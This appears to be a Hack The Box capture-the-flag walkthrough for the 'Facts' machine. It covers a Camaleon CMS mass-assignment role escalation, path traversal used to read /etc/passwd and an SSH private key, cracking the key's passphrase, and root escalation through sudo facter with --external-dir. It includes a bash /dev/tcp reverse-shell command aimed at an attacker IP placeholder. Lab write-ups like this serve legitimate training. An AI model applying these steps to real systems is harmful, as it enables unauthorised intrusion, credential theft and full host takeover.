Skip to content

Hack The Box - Facts Walkthrough

Overview

Item Details
Platform Hack The Box
Machine Facts
Difficulty Easy
OS Linux
Created By LazyTitan33
Release Date 31 January 2026
Pwn Date 14 February 2026

HTB Machine

Facts got relases as part of Hack The Box Season 10. If you focus on the available CVEs related to the target you can easily pwn Facts.
All you need is a good recon about the target and an idea about the general files available in linux. It will help you get into the machine. Then check the services we can use as root without password. That'll do the magic 🪄.

Enumeration

Let's start with open ports and services enumeration.
Nmap Scan

Take note of the services and the SSH algorithm used and the http service information.

When tried to access the IP in browser it triggered an error. We need to assign the domain name in our "/etc/hosts" file.
Host Added in /etc/hosts

Lets visit the website and explore.
Web Page

For additional information perform directory enumeration.

ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -fw 1328 -r
Directory Enumeration

I did try some credentials in the /admin/login page but couldn't login.
Login Page

So to explore the website functionalites, creat a user and login.
Registration Page

Logged In

Capturing User Flag

So the website is created using Camaleon CMS Version 2.9.0. That is an important information to start. Do OSINT on this CMS and version. We'll be able to find some CVEs released for it.
There is one mass assignment vulnerability reported. Which can be useful for us to get administrative access in the website.

Reference:
https://github.com/advisories/GHSA-rp28-mvq3-wf8j
https://medium.com/@iamkumarraj/mass-assignment-vulnerability-in-camaleon-cms-2-9-0-ajax-privilege-escalation-9a09c8253b52

Lets use the change password option in the edit profile section. Profile Edit Section

Change password function

Use your burpsuite to intercept the request and response of the password change functionality.
Original Request

Now alter this request body by including an extra parameter password[role]=admin. And as you can see we'll be getting a success response.
Modified Request

Password Change Success

Now if you reload you can find some new functionalities enabled for your profile.
Admin Functionalities Enabled

So after getting admini privilege on the website I started exploring. Checked different features tried to exploit it.
I thought we might get a reverse shell through file attachment in the pages option. But that didn't work. The uploaded content is being stored in a static environment where it gets downloaded instead of execution when tried to access.

Pages feature

Page creation

Uploaded php reverse shell file

I started searching for other vulnerabilities found in Camaleon CMS. There is one path traversal vulnerability found in Media section. Where all uploaded contents viewed.
Media Section

Reference:
https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS/

So lets confirm our finding by fetching the "/etc/passwd" file.
Path traversal

/etc/passwd file

From this we can confirm two things - Path traversal vulnerability exists & available users.

Using the exploit we can easily capture the user flag.
User Flag Captured

Capturing Root Flag

After capturing user flag I started wandering around the directories targetting some general files. I targetted id_rsa file, so that I can access target through SSH.
id_rsa file not available

But the thing I missed here is, SSH is using different encryption algorithm not RSA (That's why asked you to note the SSH algorithm in the beginning itself).
SSH Encryption

Got the private key

Here we got the SSH private key of the user Trivia. If you decode it you can see that it is encrypted with bcrypt function.

echo "ssh-key" | tr -d '\n' | base64 -d | xxd | head
Decoded SSH Key

Now lets crack it using John The Ripper tool.
Cracked!

The password we found: dragonballz

Using the private key and the password access the user trivia.
Logged in as trivia

Now lets perform simple checks, that can be used for privilege escalation.
If you execute sudo -l you can see that /usr/bin/facter command can be executed as sudo without entering the password.
Facter with sudo privs

You can confirm it with facter -p command.

Reference:
https://docs.oracle.com/en/operating-systems/solaris/oracle-solaris/11.4/use-puppet/gathering-information-system-using-facter.html

facter command checking

Now let's check if we can execute something as root.
Executed as root

As the result confirms we executed the command as root. Now lets try to capture the root flag from root directory using the following commands.

trivia@facts:~$ echo -e '#!/bin/bash\necho rootflag=$(cat /root/root.txt)' > /tmp/rootflag  
trivia@facts:~$ chmod +x /tmp/rootflag  
trivia@facts:~$ sudo /usr/bin/facter --external-dir=/tmp rootflag

Explanation:
- First we are creating a script file rootflag. Which will contain the bash command for printing root.txt. Facter only displays values in key=value format so we modified the command to rootflag=$(cat /root/root.txt) instead of just cat /root/root.txt.
- Next we need to give execution permission to the file /tmp/rootflag.
- Then we are executing facter with sudo. --external-dir attribute is used for loading external facts from a directory. Here facter will check for executables files in the /tmp directory and display the output.

Root Flag Captured!

We succesfully captured the root flag. But lets create a interactive shell as root.

trivia@facts:~$ echo -e '#!/bin/bash\necho shell=$(bash -p -i >& /dev/tcp/<attacker-ip>/<port> 0>&1)' > /tmp/nc  
trivia@facts:~$ chmod +x /tmp/nc  
trivia@facts:~$ sudo /usr/bin/facter --external-dir=/tmp nc
Now start a netcat listener on your device and get the reverse shell.
Triggering reverse shell as root
Shell as root

We successfully Pwned Facts🎉.
Machine Completed

The Valentine's Day Special 💝.